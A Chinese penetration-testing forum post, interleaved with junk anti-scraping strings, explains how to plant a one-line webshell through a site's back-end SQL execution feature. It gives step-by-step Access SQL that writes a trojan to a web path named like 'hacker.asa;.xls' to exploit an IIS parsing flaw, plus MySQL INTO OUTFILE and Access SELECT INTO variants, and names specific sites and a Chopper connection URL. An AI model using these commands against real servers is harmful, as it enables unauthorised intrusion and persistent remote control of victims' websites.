中国网络渗透测试联盟
标题:
ACCESS执行SQL命令导出一句话SHELL
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
! l, h% q' A# f1 Q2 R n
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
; _# {! |; i- l6 @, W
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
M/ n- ^% y$ S+ n9 u2 Q, ~
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
& s6 o; h. P+ g5 X& ~" `, I) L1 ~
1.create table cmd (a varchar(50))
+ A' _- Y5 M& S5 S2 d
2.insert into cmd (a) values (‘‘)
, T/ s5 n- s) _* C
3.select * into [a] in ‘D:\wwwroot\
www.koohik.com
\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
% ^% t' |, K- I3 o, ]: a+ @
(把表cmd的内容导出为物理路径的一个EXCEL文件)
4 G+ x) z! `6 X9 U5 h, U; I
4.drop table cmd
( o2 Y7 h! `, l9 g( ]# m( D
利用IIS的BUG成功拿到了WEBSHELL。
+ n: B% d% T% Y. \
X8 p+ u: y! g! E4 Q
直接菜刀里连接
http://www.chouwazi.com/data/xiao.asp;xiao.xls
一句话
5 G7 S N! r; H- H- s/ x4 q
% v2 t$ x5 {: p( l$ `
SQL语句意思解释:
+ E/ ]# X1 Z+ I7 g8 T
第一句
4 W' B2 [& l: V7 C6 v" u
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
3 c6 a9 _1 Q6 o6 z. ` \
6 @% w2 K9 z9 S* o8 O
第二句
8 Y h: @1 T( u- d+ Z0 O/ u
在表cmd的a字段插入一句话木马
" z/ B2 E% S# \( N; e0 B
第三句
9 b c B0 H) X6 \6 |% H6 [
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
* W: U; r0 O- m9 m/ L
( s* W! r' o& G9 }" j: K3 K% t
第四句
1 K# k: d5 Q0 R- F
删除建立的cmd表
" J( }% `7 s& v1 S2 y
6 o+ D7 M+ D# |, Y) f
以下内容为测试:
; a" L; [& @6 ?8 Y$ I
Access利用后台SQL执行命令功能导出WebShell:
8 n+ k" D( r2 u# n, m/ W
这个更简单:
8 C' V1 R) }- m" A }! J2 b. ^' `+ e
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
& C" P+ x' m; q8 M; ~
或者
+ c0 Y% F: a) R. C( o; _; P
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
9 |: v3 T* m1 F# ~ v. d0 O' Y- _2 u
) E& K K2 z4 H+ m! Y9 c! N) g( z
后台有执行SQL语句功能(vote为已知表段)
/ _# \2 {! f3 E$ T% U- p
希望对大家有所帮助拿shell的又一个思路
# A* l% [; K, {" M
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2